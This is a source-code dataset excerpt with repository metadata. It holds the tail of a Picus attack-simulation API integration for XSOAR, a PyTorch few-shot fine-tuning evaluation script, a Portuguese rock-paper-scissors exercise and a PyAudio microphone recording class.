    picus_post_data_vector = {"trusted":victim_peer,"untrusted":attacker_peer,"begin_date":begin_date,"end_date":end_date}
    picus_vector_response = requests.post(picus_req_url, headers=picus_headers, data=json.dumps(picus_post_data_vector),verify=verify_certificate)
    # only the first variant entry of the response is inspected
    picus_vector_results = json.loads(picus_vector_response.text)["data"]["variants"][0]
    picus_vector_secure_results = picus_vector_results["secures"]
    picus_vector_insecure_results = picus_vector_results["insecures"]
    picus_vector_secure_to_insecures_results = picus_vector_results["secure_to_insecures"]
    picus_vector_insecure_to_secures_results = picus_vector_results["insecure_to_secures"]
    if picus_vector_secure_results is not None:
        for result in picus_vector_secure_results:
            tmp_result = {"status":"secure","threat_id":result["threat_id"],"name":result["name"]}
            all_vector_results["results"].append(tmp_result)
    else:
        tmp_result = {"status": "secure", "threat_id": "null", "name": "null"}
        all_vector_results["results"].append(tmp_result)
    if picus_vector_insecure_results is not None:
        for result in picus_vector_insecure_results:
            tmp_result = {"status":"insecure","threat_id":result["threat_id"],"name":result["name"]}
            all_vector_results["results"].append(tmp_result)
    else:
        tmp_result = {"status": "insecure", "threat_id": "null", "name": "null"}
        all_vector_results["results"].append(tmp_result)
    if picus_vector_secure_to_insecures_results is not None:
        for result in picus_vector_secure_to_insecures_results:
            tmp_result = {"status":"secure_to_insecures","threat_id":result["threat_id"],"name":result["name"]}
            all_vector_results["results"].append(tmp_result)
    else:
        tmp_result = {"status": "secure_to_insecures", "threat_id": "null", "name": "null"}
        all_vector_results["results"].append(tmp_result)
    if picus_vector_insecure_to_secures_results is not None:
        for result in picus_vector_insecure_to_secures_results:
            tmp_result = {"status":"insecure_to_secures","threat_id":result["threat_id"],"name":result["name"]}
            all_vector_results["results"].append(tmp_result)
    else:
        tmp_result = {"status": "insecure_to_secures", "threat_id": "null", "name": "null"}
        all_vector_results["results"].append(tmp_result)
    all_vector_results = all_vector_results["results"]
    table_name = "Picus Vector Compare Result"
    table_headers = ['status','threat_id','name']
    md_table = tableToMarkdown(table_name, all_vector_results, headers=table_headers, removeNull=True,headerTransform=string_to_table_header)
    results = CommandResults(readable_output=md_table,outputs=all_vector_results,outputs_prefix="Picus.vectorresults",outputs_key_field="threat_id")
    return results
def returnListTimeKey(attack_result_list):
    """Sort key helper: extract the 'end_time' field of an attack-result dict
    (None when the key is absent)."""
    end_time = attack_result_list.get("end_time")
    return end_time
def setParamPB():
    """Collect the playbook parameters from the command arguments.

    Validates 'variant' against VALID_VARIANTS (return_error otherwise) and
    stores attacker/victim peers, variant, mitigation product and the day
    window under the Picus.param context path.
    """
    args = demisto.args()
    attacker_peer = args.get('attacker_peer')
    victim_peer = args.get('victim_peer')
    variant = args.get('variant')
    if variant not in VALID_VARIANTS:
        return_error("Unknown variant type - " + variant)
    mitigation_product = args.get('mitigation_product')
    days = int(args.get('days'))
    param_data = {
        "attacker_peer": attacker_peer,
        "victim_peer": victim_peer,
        "variant": variant,
        "mitigation_product": mitigation_product,
        "days": days,
    }
    return CommandResults(outputs=param_data, outputs_prefix="Picus.param")
def getPicusVersion():
    """Fetch the Picus platform version/update information and return it as
    CommandResults (context path Picus.versioninfo, keyed by 'version')."""
    endpoint = "/user-api/v1/settings/version"
    req_url, headers = generateEndpointURL(getAccessToken(), endpoint)
    response = requests.post(req_url, headers=headers, verify=verify_certificate)
    version_data = json.loads(response.text)["data"]
    picus_version_info = {
        "version": version_data["version"],
        "update_time": version_data["update_time"],
        "last_update_date": version_data["last_update_date"],
    }
    md_table = tableToMarkdown(
        "Picus Version",
        picus_version_info,
        headers=['version', 'update_time', 'last_update_date'],
        removeNull=True,
        headerTransform=string_to_table_header,
    )
    return CommandResults(readable_output=md_table, outputs=picus_version_info,
                          outputs_prefix="Picus.versioninfo", outputs_key_field="version")
def triggerUpdate():
    """Ask the Picus server to trigger a content update and return the raw
    API response rendered as a markdown table."""
    req_url, req_headers = generateEndpointURL(getAccessToken(), "/user-api/v1/settings/trigger-update")
    response = requests.post(req_url, headers=req_headers, verify=verify_certificate)
    update_results = json.loads(response.text)
    md_table = tableToMarkdown(
        "Picus Trigger Update",
        update_results,
        headers=['data', 'success'],
        removeNull=True,
        headerTransform=string_to_table_header,
    )
    return CommandResults(
        readable_output=md_table,
        outputs=update_results,
        outputs_prefix="Picus.triggerupdate",
    )
def generateEndpointURL(picus_accessToken, picus_endpoint):
    """Build the full request URL and authenticated headers for a Picus API call.

    The base server address comes from the integration parameters; the bearer
    token is placed in the X-Api-Token header.
    """
    base_url = str(demisto.params().get("picus_server"))
    picus_headers = {
        "X-Api-Token": "Bearer " + picus_accessToken,
        "Content-Type": "application/json",
    }
    return base_url + picus_endpoint, picus_headers
''' MAIN FUNCTION '''
def main() -> None:
    """main function, parses params and runs command functions

    Dispatches the incoming XSOAR command to its implementation and converts
    any exception into a user-facing error entry.
    """
    demisto.debug(f'Command being called is {demisto.command()}')
    # Command-name -> implementation dispatch table (replaces the long
    # if/elif ladder; every handler takes no arguments and returns results).
    commands = {
        'test-module': test_module,
        'picus-get-access-token': getAccessToken,
        'picus-get-vector-list': getVectorList,
        'picus-get-peer-list': getPeerList,
        'picus-get-attack-results': getAttackResults,
        'picus-run-attacks': runAttacks,
        'picus-get-threat-results': getThreatResults,
        'picus-set-paramPB': setParamPB,
        'picus-filter-insecure-attacks': filterInsecureAttacks,
        'picus-get-mitigation-list': getMitigationList,
        'picus-get-vector-compare': getVectorCompare,
        'picus-version': getPicusVersion,
        'picus-trigger-update': triggerUpdate,
    }
    try:
        command = demisto.command()
        if command not in commands:
            # BUG FIX: unknown commands previously fell through the if/elif
            # chain and succeeded silently; raising makes the failure visible.
            raise NotImplementedError(f'Command {command} is not implemented')
        return_results(commands[command]())
    # Log exceptions and return errors
    except Exception as e:
        demisto.error(traceback.format_exc())  # print the traceback
        return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 20,984 | 0 | 322 |
bd0aec9e1d68f753b5a96352b8845b7119fb3cc1 | 12,706 | py | Python | cdfsl-benchmark/finetune.py | indy-lab/ProtoTransfer | 90a526bb209160e376b2b8290e99b0f62b240052 | [
"MIT"
] | 43 | 2020-06-23T08:09:08.000Z | 2022-03-03T03:05:34.000Z | cdfsl-benchmark/finetune.py | Asphalt93/ProtoTransfer | 2e186ffd5bd795244c6dd7192575b84f935c5749 | [
"MIT"
] | 5 | 2020-07-03T20:58:24.000Z | 2021-08-04T06:34:09.000Z | cdfsl-benchmark/finetune.py | Asphalt93/ProtoTransfer | 2e186ffd5bd795244c6dd7192575b84f935c5749 | [
"MIT"
] | 9 | 2020-07-21T03:26:29.000Z | 2021-09-26T06:10:37.000Z | import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.optim
import torch.nn.functional as F
import torch.optim.lr_scheduler as lr_scheduler
import time
import os
import glob
from itertools import combinations
import configs
import backbone
from data.datamgr import SimpleDataManager, SetDataManager
from methods.protonet import ProtoNet
from io_utils import model_dict, parse_args, get_resume_file, get_best_file, get_assigned_file
from utils import *
from datasets import ISIC_few_shot, EuroSAT_few_shot, CropDisease_few_shot, Chest_few_shot
from tqdm import tqdm
import sys
sys.path.append('..')
from methods.protonet import euclidean_dist
if __name__=='__main__':
    # Evaluation driver: loads the cross-domain few-shot benchmark datasets
    # and runs finetune() on each selected loader.
    np.random.seed(10)
    params = parse_args('test')
    ##################################################################
    image_size = 224
    iter_num = 600
    n_query = max(1, int(16* params.test_n_way/params.train_n_way)) #if test_n_way is smaller than train_n_way, reduce n_query to keep batch size small
    few_shot_params = dict(n_way = params.test_n_way , n_support = params.n_test_shot)
    freeze_backbone = params.freeze_backbone
    ##################################################################
    dataset_names = ["ISIC", "EuroSAT", "CropDisease", "ChestX"]
    novel_loaders = []
    # NOTE(review): only the ChestX loader is appended below; the append
    # calls for ISIC, EuroSAT and CropDisease are commented out even though
    # their loaders are still built — confirm this is the intended subset.
    loader_name = "ISIC"
    print ("Loading {}".format(loader_name))
    datamgr = ISIC_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
    novel_loader = datamgr.get_data_loader(aug =False)
    #novel_loaders.append((loader_name, novel_loader))
    loader_name = "EuroSAT"
    print ("Loading {}".format(loader_name))
    datamgr = EuroSAT_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
    novel_loader = datamgr.get_data_loader(aug =False)
    #novel_loaders.append((loader_name, novel_loader))
    loader_name = "CropDisease"
    print ("Loading {}".format(loader_name))
    datamgr = CropDisease_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
    novel_loader = datamgr.get_data_loader(aug =False)
    #novel_loaders.append((loader_name, novel_loader))
    loader_name = "ChestX"
    print ("Loading {}".format(loader_name))
    datamgr = Chest_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
    novel_loader = datamgr.get_data_loader(aug =False)
    novel_loaders.append((loader_name, novel_loader))
    #########################################################################
    # Print checkpoint path to be loaded
    checkpoint_dir = '%s/checkpoints/%s/%s_%s_%s%s_%s%s' %(configs.save_dir, params.dataset,
                                                           params.model, params.method,
                                                           params.n_support, "s" if params.no_aug_support else "s_aug",
                                                           params.n_query, "q" if params.no_aug_query else "q_aug")
    checkpoint_dir += "_bs{}".format(params.batch_size)
    if params.save_iter != -1:
        modelfile = get_assigned_file(checkpoint_dir, params.save_iter)
    elif params.method in ['baseline', 'baseline++'] :
        modelfile = get_resume_file(checkpoint_dir)
    else:
        modelfile = get_best_file(checkpoint_dir)
    print('Evaluation from checkpoint:', modelfile)
    # Perform evaluation
    for idx, (loader_name, novel_loader) in enumerate(novel_loaders):
        #for idx, novel_loader in tqdm(enumerate(novel_loaders), total=len(novel_loaders), position=0):
        print ('Dataset: ', loader_name)
        print ('Pretraining Dataset: ', params.dataset)
        print('Adaptation? ', params.adaptation)
        if params.adaptation:
            print (' --> Freeze backbone?', freeze_backbone)
            print (' --> Init classifier via prototypes?', params.proto_init)
            print (' --> Adaptation steps: ', params.ft_steps)
            print (' --> Adaptation learning rate: ', params.lr_rate)
        # replace finetine() with your own method
        finetune(novel_loader, n_query = 15, adaptation=params.adaptation,
                 freeze_backbone=freeze_backbone, proto_init=params.proto_init,
                 pretrained_dataset=params.dataset, **few_shot_params)
| 42.925676 | 199 | 0.548324 | import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.optim
import torch.nn.functional as F
import torch.optim.lr_scheduler as lr_scheduler
import time
import os
import glob
from itertools import combinations
import configs
import backbone
from data.datamgr import SimpleDataManager, SetDataManager
from methods.protonet import ProtoNet
from io_utils import model_dict, parse_args, get_resume_file, get_best_file, get_assigned_file
from utils import *
from datasets import ISIC_few_shot, EuroSAT_few_shot, CropDisease_few_shot, Chest_few_shot
from tqdm import tqdm
import sys
sys.path.append('..')
from methods.protonet import euclidean_dist
class Classifier(nn.Module):
    """A single linear layer mapping feature vectors to n_way class scores."""

    def __init__(self, dim, n_way):
        super(Classifier, self).__init__()
        self.fc = nn.Linear(dim, n_way)

    def forward(self, x):
        return self.fc(x)

    def _set_params(self, weight, bias):
        # Overwrite the linear layer's parameters in one shot.
        self.fc.load_state_dict({'weight': weight, 'bias': bias})

    def init_params_from_prototypes(self, z_support, n_way, n_support):
        """Initialise the layer so its logits equal (up to a per-query constant)
        the negative squared distances to the class prototypes.

        Interpretation of ProtoNet as a linear layer (see Snell et al. (2017)).
        """
        prototypes = z_support.contiguous().view(n_way, n_support, -1).mean(dim=1)
        self._set_params(weight=2 * prototypes,
                         bias=-torch.norm(prototypes, dim=-1) ** 2)
class ProtoClassifier():
    """Non-parametric ProtoNet head: scores each query embedding by the
    negative distance to the per-class mean of the support embeddings."""

    def __init__(self, n_way, n_support, n_query):
        self.n_way = n_way
        self.n_support = n_support
        self.n_query = n_query

    def __call__(self, z_support, y_support, z_query):
        # y_support is unused; it is kept so the call signature stays
        # interchangeable with the adapted (linear) classifier path.
        prototypes = z_support.contiguous().view(self.n_way, self.n_support, -1).mean(1)
        queries = z_query.contiguous().view(self.n_way * self.n_query, -1)
        # Higher score == closer to the prototype.
        return -euclidean_dist(queries, prototypes)
def finetune(novel_loader, n_query = 15, freeze_backbone = False,
             n_way = 5, n_support = 5, loadpath = '', adaptation = False,
             pretrained_dataset = 'miniImagenet', proto_init = False):
    """Evaluate few-shot episodes from novel_loader with a pretrained backbone.

    For every episode the pretrained checkpoint is reloaded, an episodic
    classifier is built (a trainable linear head when adaptation=True,
    otherwise a non-parametric ProtoClassifier), optionally fine-tuned on the
    support set, and top-1 accuracy on the query set is accumulated.
    Prints the mean accuracy with a 95% confidence interval at the end.
    NOTE(review): requires CUDA; `loadpath` and `pretrained_dataset` are
    accepted but unused here — confirm against callers.
    """
    correct = 0
    count = 0
    iter_num = len(novel_loader)
    acc_all = []
    with tqdm(enumerate(novel_loader), total=len(novel_loader)) as pbar:
        for _, (x, y) in pbar:#, position=1,
            #leave=False):
            ###############################################################################################
            # load pretrained model on miniImageNet
            pretrained_model = model_dict[params.model]()
            checkpoint_dir = '%s/checkpoints/%s/%s_%s_%s%s_%s%s' %(configs.save_dir, params.dataset,
                                                                   params.model, params.method,
                                                                   params.n_support, "s" if params.no_aug_support else "s_aug",
                                                                   params.n_query, "q" if params.no_aug_query else "q_aug")
            checkpoint_dir += "_bs{}".format(params.batch_size)
            if params.save_iter != -1:
                modelfile = get_assigned_file(checkpoint_dir, params.save_iter)
            elif params.method in ['baseline', 'baseline++'] :
                modelfile = get_resume_file(checkpoint_dir)
            else:
                modelfile = get_best_file(checkpoint_dir)
            tmp = torch.load(modelfile)
            state = tmp['state']
            state_keys = list(state.keys())
            # Keep only backbone weights, stripping the "feature." prefix so the
            # state dict matches the bare backbone module.
            for _, key in enumerate(state_keys):
                if "feature." in key:
                    newkey = key.replace("feature.","")  # an architecture model has attribute 'feature', load architecture feature to backbone by casting name from 'feature.trunk.xx' to 'trunk.xx'
                    state[newkey] = state.pop(key)
                else:
                    state.pop(key)
            pretrained_model.load_state_dict(state)
            pretrained_model.cuda()
            pretrained_model.train()
            ###############################################################################################
            if adaptation:
                classifier = Classifier(pretrained_model.final_feat_dim, n_way)
                classifier.cuda()
                classifier.train()
            else:
                classifier = ProtoClassifier(n_way, n_support, n_query)
            ###############################################################################################
            # Split the episode tensor into support (x_a_i) and query (x_b_i).
            n_query = x.size(1) - n_support
            x = x.cuda()
            x_var = Variable(x)
            batch_size = n_way
            support_size = n_way * n_support
            y_a_i = Variable( torch.from_numpy( np.repeat(range( n_way ), n_support ) )).cuda() # (25,)
            x_b_i = x_var[:, n_support:,:,:,:].contiguous().view( n_way* n_query, *x.size()[2:])
            x_a_i = x_var[:,:n_support,:,:,:].contiguous().view( n_way* n_support, *x.size()[2:]) # (25, 3, 224, 224)
            # Support embeddings, computed in eval mode (frozen batch-norm stats).
            pretrained_model.eval()
            z_a_i = pretrained_model(x_a_i.cuda())
            pretrained_model.train()
            ###############################################################################################
            loss_fn = nn.CrossEntropyLoss().cuda()
            if adaptation:
                inner_lr = params.lr_rate
                if proto_init: # Initialise as distance classifer (distance to prototypes)
                    classifier.init_params_from_prototypes(z_a_i,
                                                           n_way, n_support)
                #classifier_opt = torch.optim.SGD(classifier.parameters(), lr = inner_lr, momentum=0.9, dampening=0.9, weight_decay=0.001)
                classifier_opt = torch.optim.Adam(classifier.parameters(), lr = inner_lr)
                if freeze_backbone is False:
                    delta_opt = torch.optim.Adam(filter(lambda p: p.requires_grad, pretrained_model.parameters()), lr = inner_lr)
                total_epoch = params.ft_steps
                if freeze_backbone is False:
                    pretrained_model.train()
                else:
                    pretrained_model.eval()
                classifier.train()
                #for epoch in range(total_epoch):
                # Fine-tune on shuffled mini-batches drawn from the support set.
                for epoch in tqdm(range(total_epoch), total=total_epoch, leave=False):
                    rand_id = np.random.permutation(support_size)
                    for j in range(0, support_size, batch_size):
                        classifier_opt.zero_grad()
                        if freeze_backbone is False:
                            delta_opt.zero_grad()
                        #####################################
                        selected_id = torch.from_numpy( rand_id[j: min(j+batch_size, support_size)]).cuda()
                        z_batch = x_a_i[selected_id]
                        y_batch = y_a_i[selected_id]
                        #####################################
                        output = pretrained_model(z_batch)
                        output = classifier(output)
                        loss = loss_fn(output, y_batch)
                        #####################################
                        loss.backward()
                        classifier_opt.step()
                        if freeze_backbone is False:
                            delta_opt.step()
                classifier.eval()
            # Score the query set and record episode top-1 accuracy.
            pretrained_model.eval()
            output = pretrained_model(x_b_i.cuda())
            if adaptation:
                scores = classifier(output)
            else:
                scores = classifier(z_a_i, y_a_i, output)
            y_query = np.repeat(range( n_way ), n_query )
            topk_scores, topk_labels = scores.data.topk(1, 1, True, True)
            topk_ind = topk_labels.cpu().numpy()
            top1_correct = np.sum(topk_ind[:,0] == y_query)
            correct_this, count_this = float(top1_correct), len(y_query)
            #print (correct_this/ count_this *100)
            acc_all.append((correct_this/ count_this *100))
            ###############################################################################################
            pbar.set_postfix(avg_acc=np.mean(np.asarray(acc_all)))
    acc_all = np.asarray(acc_all)
    acc_mean = np.mean(acc_all)
    acc_std = np.std(acc_all)
    print('%d Test Acc = %4.2f%% +- %4.2f%%' %(iter_num, acc_mean, 1.96* acc_std/np.sqrt(iter_num)))
if __name__=='__main__':
    # Evaluation driver: loads the cross-domain few-shot benchmark datasets
    # and runs finetune() on each selected loader.
    np.random.seed(10)
    params = parse_args('test')
    ##################################################################
    image_size = 224
    iter_num = 600
    n_query = max(1, int(16* params.test_n_way/params.train_n_way)) #if test_n_way is smaller than train_n_way, reduce n_query to keep batch size small
    few_shot_params = dict(n_way = params.test_n_way , n_support = params.n_test_shot)
    freeze_backbone = params.freeze_backbone
    ##################################################################
    dataset_names = ["ISIC", "EuroSAT", "CropDisease", "ChestX"]
    novel_loaders = []
    # NOTE(review): only the ChestX loader is appended below; the append
    # calls for ISIC, EuroSAT and CropDisease are commented out even though
    # their loaders are still built — confirm this is the intended subset.
    loader_name = "ISIC"
    print ("Loading {}".format(loader_name))
    datamgr = ISIC_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
    novel_loader = datamgr.get_data_loader(aug =False)
    #novel_loaders.append((loader_name, novel_loader))
    loader_name = "EuroSAT"
    print ("Loading {}".format(loader_name))
    datamgr = EuroSAT_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
    novel_loader = datamgr.get_data_loader(aug =False)
    #novel_loaders.append((loader_name, novel_loader))
    loader_name = "CropDisease"
    print ("Loading {}".format(loader_name))
    datamgr = CropDisease_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
    novel_loader = datamgr.get_data_loader(aug =False)
    #novel_loaders.append((loader_name, novel_loader))
    loader_name = "ChestX"
    print ("Loading {}".format(loader_name))
    datamgr = Chest_few_shot.SetDataManager(image_size, n_eposide = iter_num, n_query = 15, **few_shot_params)
    novel_loader = datamgr.get_data_loader(aug =False)
    novel_loaders.append((loader_name, novel_loader))
    #########################################################################
    # Print checkpoint path to be loaded
    checkpoint_dir = '%s/checkpoints/%s/%s_%s_%s%s_%s%s' %(configs.save_dir, params.dataset,
                                                           params.model, params.method,
                                                           params.n_support, "s" if params.no_aug_support else "s_aug",
                                                           params.n_query, "q" if params.no_aug_query else "q_aug")
    checkpoint_dir += "_bs{}".format(params.batch_size)
    if params.save_iter != -1:
        modelfile = get_assigned_file(checkpoint_dir, params.save_iter)
    elif params.method in ['baseline', 'baseline++'] :
        modelfile = get_resume_file(checkpoint_dir)
    else:
        modelfile = get_best_file(checkpoint_dir)
    print('Evaluation from checkpoint:', modelfile)
    # Perform evaluation
    for idx, (loader_name, novel_loader) in enumerate(novel_loaders):
        #for idx, novel_loader in tqdm(enumerate(novel_loaders), total=len(novel_loaders), position=0):
        print ('Dataset: ', loader_name)
        print ('Pretraining Dataset: ', params.dataset)
        print('Adaptation? ', params.adaptation)
        if params.adaptation:
            print (' --> Freeze backbone?', freeze_backbone)
            print (' --> Init classifier via prototypes?', params.proto_init)
            print (' --> Adaptation steps: ', params.ft_steps)
            print (' --> Adaptation learning rate: ', params.lr_rate)
        # replace finetine() with your own method
        finetune(novel_loader, n_query = 15, adaptation=params.adaptation,
                 freeze_backbone=freeze_backbone, proto_init=params.proto_init,
                 pretrained_dataset=params.dataset, **few_shot_params)
| 7,931 | 10 | 229 |
2286f06f0ba8238d9eb915afbf31f42dee3d624c | 1,122 | py | Python | Mundo02CursoemVideo/ex045.py | JuniorMelo-Dev/Python_Guanabara | 680ea59aba81ef043cef2aec46d0ebf1dd4f8c7c | [
"MIT"
] | null | null | null | Mundo02CursoemVideo/ex045.py | JuniorMelo-Dev/Python_Guanabara | 680ea59aba81ef043cef2aec46d0ebf1dd4f8c7c | [
"MIT"
] | null | null | null | Mundo02CursoemVideo/ex045.py | JuniorMelo-Dev/Python_Guanabara | 680ea59aba81ef043cef2aec46d0ebf1dd4f8c7c | [
"MIT"
] | null | null | null | # Crie um programa e faça-o jogar Jokenpô com você.
# Exercise: make the program play Jokenpo (rock-paper-scissors) with you.
from random import randint
from time import sleep
# 0 = rock, 1 = paper, 2 = scissors; the index doubles as the move code.
itens = ('PEDRA', 'PAPEL', 'TESOURA')
pc = randint(0, 2)
print('''\033[1;4;7;30;47mOPÇÕES\033[m
[ 0 ] \033[1;31mPEDRA\033[m
[ 1 ] \033[1;31mPAPEL\033[m
[ 2 ] \033[1;31mTESOURA\033[m''')
jogador = int(input('Qual a sua jogada? '))
# NOTE(review): the player's move is used as an index below without
# validation — an input outside 0-2 raises IndexError before the final
# "invalid play" branch (which tests pc, always valid) can ever run.
print('JO')
sleep(1)
print('KEN')
sleep(1)
print('PO!')
print('-=-' * 11)
print('PC jogou {}'.format(itens[pc]))
print('Jogador jogou {}'.format(itens[jogador]))
print('-=-' * 11)
if pc == 0:  # the computer played ROCK
    if jogador == 0:
        print('EMPATE')
    elif jogador == 1:
        print('JOGADOR VENCEU !!')
    elif jogador == 2:
        print('PC VENCEU !!')
elif pc == 1:  # the computer played PAPER
    if jogador == 0:
        print('PC VENCEU !!')
    elif jogador == 1:
        print('EMPATE')
    elif jogador == 2:
        print('JOGADOR VENCEU !!')
elif pc == 2:  # the computer played SCISSORS
    if jogador == 0:
        print('JOGADOR VENCEU !!')
    elif jogador == 1:
        print('PC VENCEU !!')
    elif jogador == 2:
        print('EMPATE')
else:
print('JOGADA INVÁLIDA!') | 25.5 | 51 | 0.571301 | # Crie um programa e faça-o jogar Jokenpô com você.
from random import randint
from time import sleep
itens = ('PEDRA', 'PAPEL', 'TESOURA')
pc = randint(0, 2)
print('''\033[1;4;7;30;47mOPÇÕES\033[m
[ 0 ] \033[1;31mPEDRA\033[m
[ 1 ] \033[1;31mPAPEL\033[m
[ 2 ] \033[1;31mTESOURA\033[m''')
jogador = int(input('Qual a sua jogada? '))
print('JO')
sleep(1)
print('KEN')
sleep(1)
print('PO!')
print('-=-' * 11)
print('PC jogou {}'.format(itens[pc]))
print('Jogador jogou {}'.format(itens[jogador]))
print('-=-' * 11)
if pc == 0: # o pc jogou PEDRA
if jogador == 0:
print('EMPATE')
elif jogador == 1:
print('JOGADOR VENCEU !!')
elif jogador == 2:
print('PC VENCEU !!')
elif pc == 1: # o pc jogou PAPEL
if jogador == 0:
print('PC VENCEU !!')
elif jogador == 1:
print('EMPATE')
elif jogador == 2:
print('JOGADOR VENCEU !!')
elif pc == 2: # o pc jogou TESOURA
if jogador == 0:
print('JOGADOR VENCEU !!')
elif jogador == 1:
print('PC VENCEU !!')
elif jogador == 2:
print('EMPATE')
else:
print('JOGADA INVÁLIDA!') | 0 | 0 | 0 |
e5a3a3eb66e2e65770653b36bee18d3f2bc1e359 | 4,832 | py | Python | src/capture-audio/capture.py | latonaio/Capture-Audio-From-Mic | 1249ce01f644e492c8ca7e47152761132cbb23b0 | [
"MIT"
] | 10 | 2021-09-22T07:14:35.000Z | 2021-11-04T10:21:21.000Z | src/capture-audio/capture.py | latonaio/Capture-Audio-From-Mic | 1249ce01f644e492c8ca7e47152761132cbb23b0 | [
"MIT"
] | null | null | null | src/capture-audio/capture.py | latonaio/Capture-Audio-From-Mic | 1249ce01f644e492c8ca7e47152761132cbb23b0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
# Copyright (c) Latona. All rights reserved.
# from StatusJsonPythonModule import StatusJsonRest
from datetime import datetime
import os
import sys
import wave
import pyaudio
import time
from threading import (Event, Thread)
from aion.logger import lprint
from .mysql import MysqlManager
OUTPUT_DIR = "/var/lib/aion/Data/capture-audio-from-mic_1"
if __name__ == "__main__":
main()
| 32.648649 | 89 | 0.630795 | #!/usr/bin/env python3
# coding: utf-8
# Copyright (c) Latona. All rights reserved.
# from StatusJsonPythonModule import StatusJsonRest
from datetime import datetime
import os
import sys
import wave
import pyaudio
import time
from threading import (Event, Thread)
from aion.logger import lprint
from .mysql import MysqlManager
OUTPUT_DIR = "/var/lib/aion/Data/capture-audio-from-mic_1"
class CaptureAudioFromMic():
    """Record audio from a PyAudio input device and write it to WAV files
    under OUTPUT_DIR, either in fixed-length chunks (output_wave_file) or
    via start/stop callback-driven recording (open_stream / start_recoding /
    complete_recording)."""
    # sampling_rate = 44100
    # sampling_rate = 48000
    # sampling_rate = 32000
    # 16-bit signed PCM samples.
    fmt = pyaudio.paInt16
    def __init__(self, device_index, sampling_rate=44100,
                 chunk=8192, ch=1, rec_time=60):
        """Open the PyAudio device at device_index; exits the process if the
        index is out of range. rec_time is the chunk length in seconds."""
        lprint(">>> Initialized Audio Device")
        self.device_index = device_index
        self.sampling_rate = sampling_rate
        self.chunk = chunk
        # NOTE(review): the ch parameter is ignored and channels are forced
        # to mono here — confirm whether this is intentional.
        self.ch = 1
        self.rec_time = rec_time
        self.audio = pyaudio.PyAudio()
        self.frame = []
        self.event = Event()
        self.is_stream_open = False
        self.recording = False
        if self.audio.get_device_count() - 1 < device_index:
            lprint(self.audio.get_device_count(), device_index)
            lprint(">>> Error: this device is not exist")
            sys.exit(1)
        audio_info = self.audio.get_device_info_by_index(device_index)
        lprint(audio_info)
        self.outputPath = OUTPUT_DIR
        os.makedirs(self.outputPath, exist_ok=True)
    def output_wave_file(self):
        """Record rec_time seconds synchronously and write a timestamped WAV
        file; returns its path."""
        lprint(">>> start opening stream")
        self.stream = self.audio.open(
            format=self.fmt, channels=self.ch, rate=self.sampling_rate,
            input=True, input_device_index=self.device_index,
            frames_per_buffer=self.chunk)
        lprint(">>> finish opening stream")
        frames = []
        # Number of chunk-sized reads needed to cover rec_time seconds.
        audio_range = int(self.sampling_rate / self.chunk * self.rec_time)
        for i in range(0, audio_range):
            data = self.stream.read(self.chunk)
            frames.append(data)
        now_time = datetime.now().strftime("%Y%m%d%H%M%S") + "000"
        outputFileName = now_time + ".wav"
        outputFilePath = os.path.join(self.outputPath, outputFileName)
        with wave.open(outputFilePath, 'wb') as wav:
            wav.setnchannels(self.ch)
            # sample width in bytes (bit depth)
            wav.setsampwidth(self.audio.get_sample_size(self.fmt))
            # sampling rate
            wav.setframerate(self.sampling_rate)
            wav.writeframes(b''.join(frames))
        self.stream.stop_stream()
        self.stream.close()
        return outputFilePath
    def open_stream(self):
        """Open an asynchronous input stream that feeds self.callback."""
        self.stream = self.audio.open(
            format=self.fmt, channels=self.ch, rate=self.sampling_rate,
            input=True, input_device_index=self.device_index,
            frames_per_buffer=self.chunk, stream_callback=self.callback)
    def callback(self, in_data, frame_count, time_info, status):
        """PyAudio stream callback: buffer incoming frames only while
        self.recording is True; always keep the stream running."""
        if self.recording is True:
            self.frame.append(in_data)
            return in_data, pyaudio.paContinue
        elif self.recording is False:
            return None, pyaudio.paContinue
        else:
            return None, pyaudio.paContinue
    def start_recoding(self):
        """Begin callback-driven recording on the stream opened by
        open_stream(). (Name typo 'recoding' kept for caller compatibility.)"""
        # initialize frame
        # self.frame = []
        # self.stream.start_stream()
        # self.event.clear()
        # lprint("recording...")
        # while not self.event.wait(timeout=0):
        #     data = self.stream.read(self.chunk)
        #     self.frame.append(data)
        self.recording = True
        self.stream.start_stream()
        lprint("record start")
    def complete_recording(self, activity_id):
        """Stop recording and write buffered frames to
        '<activity_id>_<device_index>.wav'; returns (sample_width,
        sampling_rate, output_file_path)."""
        lprint("stop recording....")
        # Buffer 5 seconds after receiving the stop signal so that recordings
        # from multiple microphones stay in sync.
        time.sleep(5)
        self.recording = False
        self.stream.stop_stream()
        output_file_name = str(activity_id) + "_" + str(self.device_index) + ".wav"
        output_file_path = os.path.join(self.outputPath, output_file_name)
        with wave.open(output_file_path, 'wb') as wav:
            wav.setnchannels(self.ch)
            # sample width in bytes (bit depth)
            wav.setsampwidth(self.audio.get_sample_size(self.fmt))
            # sampling rate
            wav.setframerate(self.sampling_rate)
            wav.writeframes(b''.join(self.frame))
        lprint("recording complete.record file output to ", output_file_path)
        return self.audio.get_sample_size(self.fmt), self.sampling_rate, output_file_path
def main():
    """Entry point: pick the input device index from argv (default 24) and
    record fixed-length WAV files in an endless loop."""
    cli_args = sys.argv
    # Exactly one argument selects the device; anything else falls back to 24.
    device_index = int(cli_args[1]) if len(cli_args) == 2 else 24
    recorder = CaptureAudioFromMic(device_index)
    print(">>> start audio recording")
    while True:
        outputFilePath = recorder.output_wave_file()
        print("> Success: output audio (path: {})".format(outputFilePath))
if __name__ == "__main__":
main()
| 4,203 | 279 | 46 |
e5b9e114418e45138f99bfeef38a9ba499a50e22 | 1,771 | py | Python | bot.py | youknowone/slairck | 2f6604c541610119dc1e48f4c1e33f3d639f0a48 | [
"MIT"
